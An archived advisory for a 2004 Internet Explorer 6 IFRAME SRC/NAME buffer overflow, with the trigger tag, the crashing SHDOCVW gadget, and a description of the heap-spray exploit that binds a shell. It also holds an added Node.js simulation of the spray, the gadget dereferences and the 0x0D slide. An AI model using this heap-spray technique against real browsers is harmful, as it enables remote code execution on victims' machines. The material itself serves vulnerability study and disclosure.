Www.edup.tudelft.nl/~bjwever/advisory iframe.html.php
From Skypher
This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that it is very likely to be chock-full of spelling errors.
Internet Explorer IFRAME src&name parameter BoF remote compromise
Vulnerability
There is an exploitable BoF in the FRAME, EMBED and IFRAME tags, reached through the SRC and NAME properties. To trigger the BoF you only need this tag in an HTML file:
- <IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">
This will overwrite EAX with 0x00420042, after which this code gets executed:
7178EC02 8B08          MOV ECX, DWORD PTR [EAX]
7178EC04 68 847B7071   PUSH SHDOCVW.71707B84
7178EC09 50            PUSH EAX
7178EC0A FF11          CALL NEAR DWORD PTR [ECX]
Control over EAX gives control over ECX (it is loaded from [EAX]), and ECX is dereferenced once more to get the CALL target, so it gives control over EIP: remote command execution.
Affected versions
The problem exists in Internet Explorer 6.0, on Win2K and WinXP (all service packs, except XP/SP2)
Exploit
exploits/InternetExploiter.zip contains InternetExploiter.html, the actual exploit. When you open this .html file in MSIE, it will try to exploit the vulnerability to bind a shell to port 28876.
The JavaScript creates a large number of heap blocks, each filled with a nopslide of 0x0D bytes followed by the shellcode. This makes sure that [0x0D0D0D0D] == 0x0D0D0D0D. It is not the most efficient thing in the world, but it works like a charm for most IE bugs. The BoF sets EAX to 0x0D0D0D0D, after which the code shown above gets executed: ECX becomes [EAX] == 0x0D0D0D0D, and CALL [ECX] therefore jumps to 0x0D0D0D0D. We land inside one of the nopslides and slide on down to the shellcode.
The shellcode is encoded into a Unicode string using my own Beta shellcode encoder.
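The gadget above and the spray described in this section, as an added worked model in Node.js (this is not code from the page and not InternetExploiter.html): it encodes the NAME string as UTF-16LE to show where 0x00420042 comes from, builds a spray block of "\u0d0d" code units plus a constructed stand-in for the shellcode, runs the two dereferences of the SHDOCVW gadget against a simulated address space, and then walks the 0x0D slide as the 5-byte instruction OR EAX, 0x0D0D0D0D. The 64 KiB block size, the sprayed range 0x0A000000-0x10000000 and the stand-in shellcode bytes are assumptions of the model, not measurements of IE6.

```javascript
// Added example, not code from the page or from InternetExploiter.html.
// Models three mechanical facts of the advisory in plain Node.js:
//  (1) a NAME of 'B's reaches EAX as 0x00420042,
//  (2) the SHDOCVW gadget dereferences EAX twice before transferring control,
//  (3) a spray of 0x0D bytes satisfies both dereferences and then executes
//      as a slide of 5-byte OR EAX, 0x0D0D0D0D instructions.
// Memory is simulated; nothing here touches a real process.

// UTF-16LE encoding of a JavaScript string, one code unit at a time.
function utf16le(str) {
  const out = [];
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    out.push(cu & 0xff, cu >> 8);
  }
  return out;
}

// Little-endian dword read from a byte array (unsigned result).
function dwordAt(bytes, off) {
  return (bytes[off] | (bytes[off + 1] << 8) | (bytes[off + 2] << 16) |
          (bytes[off + 3] << 24)) >>> 0;
}

// (1) The overflowing NAME is stored as UTF-16LE ('B' -> 42 00), so the
// register loaded from it reads 0x00420042: an address nothing maps.
function registerValueFromName(name) {
  return dwordAt(utf16le(name), 0);
}

// (2) One spray block: a slide of "\u0d0d" code units followed by the
// shellcode string. In memory that is 0D 0D 0D ... then the shellcode bytes.
function buildBlock(shellcodeStr, blockUnits) {
  const slideUnits = blockUnits - shellcodeStr.length;
  if (slideUnits <= 0) throw new Error('block too small for the shellcode');
  return utf16le('\u0d0d'.repeat(slideUnits) + shellcodeStr);
}

// Simulated address space: nBlocks copies of `block` back to back from
// `base`; every other address is unmapped (reads return null).
function makeMemory(block, base, nBlocks) {
  const size = block.length;
  const end = base + size * nBlocks;
  const byte = (addr) => (addr < base || addr >= end) ? null
                                                     : block[(addr - base) % size];
  const dword = (addr) => {
    const b = [0, 1, 2, 3].map((i) => byte(addr + i));
    return b.includes(null) ? null : dwordAt(b, 0);
  };
  return { base, end, size, byte, dword };
}

// (3) The gadget from the advisory:
//   MOV ECX, [EAX] ; PUSH 71707B84h ; PUSH EAX ; CALL [ECX]
// Two loads before the transfer. Returns the new EIP, or the address of the
// first unmapped read (an access violation: a crash, not a shell).
function runGadget(mem, eax) {
  const ecx = mem.dword(eax);
  if (ecx === null) return { fault: eax };
  const eip = mem.dword(ecx);
  if (eip === null) return { fault: ecx };
  return { ecx, eip };
}

// Walk the slide from the landing address. 0D xx xx xx xx decodes as
// OR EAX, imm32, so execution advances 5 bytes per instruction and the last
// one can swallow up to 4 leading shellcode bytes as its immediate.
function landing(mem, slideBytes, eip) {
  const off = (eip - mem.base) % mem.size;      // offset inside the block hit
  const shellcodeAddr = eip - off + slideBytes;
  if (off >= slideBytes) return { inSlide: false, shellcodeAddr, swallowed: null };
  let pc = eip;
  while (pc < shellcodeAddr) {
    if (mem.byte(pc) !== 0x0d) throw new Error('expected slide byte');
    pc += 5;
  }
  return { inSlide: true, shellcodeAddr, swallowed: pc - shellcodeAddr };
}

// Layout used for the walk-through. The block size, the sprayed range and
// the shellcode bytes are assumptions of this model, not measurements of IE6.
function demo() {
  const shellcode = '\u4950\u4949\u4949';          // constructed stand-in, not real shellcode
  const blockUnits = 0x8000;                       // 64 KiB per block
  const block = buildBlock(shellcode, blockUnits);
  const slideBytes = (blockUnits - shellcode.length) * 2;
  const mem = makeMemory(block, 0x0a000000, 0x600); // covers 0x0A000000-0x10000000
  const crash = runGadget(mem, registerValueFromName('BBBB'));
  const hit = runGadget(mem, 0x0d0d0d0d);
  const land = landing(mem, slideBytes, hit.eip);
  return { crash, hit, land };
}

const hex = (n) => '0x' + n.toString(16).padStart(8, '0');
const r = demo();
console.log(`NAME of B's -> EAX ${hex(r.crash.fault)}: unmapped, gadget faults`);
console.log(`EAX 0x0d0d0d0d -> ECX ${hex(r.hit.ecx)} -> EIP ${hex(r.hit.eip)}`);
console.log(`slide ends at ${hex(r.land.shellcodeAddr)}, ${r.land.swallowed} shellcode byte(s) swallowed`);
```

Run it with node. Two things the paragraph does not spell out fall out of the model. First, the raw overflow value 0x00420042 is just an unmapped address, so without the spray the gadget faults on MOV ECX,[EAX] and nothing executes; the spray is what turns the crash into a jump. Second, each 0x0D in the slide is really a 5-byte OR EAX, imm32, so the last slide instruction can swallow up to 4 shellcode bytes as its immediate (1 byte in this layout); the landing offset inside the block, or the slide length, has to be arranged so the shellcode starts on an instruction boundary. The byte value also doubles as the address it must resolve to, so it has to decode to a harmless instruction and lie in the user half of the 32-bit address space: 0x0D does both, while a 0x90 (NOP) spray would give 0x90909090, above 0x80000000.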
Timeline
| Date | Event |
|---|---|
| 2004-10-24 | ned discovers bug in IE. |
| 2004-10-25 | Bug turns out to be a BoF, advisory released. |
| 2004-11-02 | Exploit released. |
| 2004-12-01 | Patch released. |
Patch
Available from the Microsoft Corporation website.
Links
- exploits/InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.
- beta shellcode encoder: Documentation.
- src/beta.c C Source file for the current version of beta shellcode encoder.
- CERT: Microsoft Internet Explorer vulnerable to buffer overflow via FRAME, IFRAME, and EMBED elements.
- Secunia: Internet Explorer IFRAME Buffer Overflow Vulnerability.
- ZDNet news: Exploit code makes IE flaw more dangerous.
- Techworld: Microsoft stalls on vast Explorer exploit.
- Wall Street Journal: "Mydoom Worm Renews Debate On Cyber-Ethics" by David Bank.
- Microsoft Corporation website: Cumulative Security Update for Internet Explorer (889293)
